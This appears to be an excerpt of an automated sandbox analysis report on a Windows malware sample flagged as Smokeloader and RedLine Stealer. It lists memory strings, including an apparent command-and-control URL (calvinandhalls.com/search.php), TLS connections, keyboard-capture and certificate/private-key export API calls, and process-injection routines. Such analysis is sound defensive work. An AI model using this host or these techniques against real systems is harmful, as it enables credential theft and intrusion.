                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                  Source: explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/WN/
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/earch.php
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php=
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
                  Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com:443/search.phpt
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.co
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                  Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                  Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
                  Source: Yara matchFile source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD162B GetKeyboardState,ToUnicode,16_2_00AD162B
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF780B63220

                  System Summary

                  barindex
                  Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00403247 NtTerminateProcess,RtlInitUnicodeString,0_2_00403247
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_0040324F NtTerminateProcess,RtlInitUnicodeString,0_2_0040324F
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00403256 NtTerminateProcess,RtlInitUnicodeString,0_2_00403256
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_0040326C NtTerminateProcess,RtlInitUnicodeString,0_2_0040326C
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00403277 NtTerminateProcess,RtlInitUnicodeString,0_2_00403277
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_0040327D NtTerminateProcess,RtlInitUnicodeString,0_2_0040327D
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00403290 NtTerminateProcess,RtlInitUnicodeString,0_2_00403290
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00403247 NtTerminateProcess,RtlInitUnicodeString,4_2_00403247
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_0040324F NtTerminateProcess,RtlInitUnicodeString,4_2_0040324F
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00403256 NtTerminateProcess,RtlInitUnicodeString,4_2_00403256
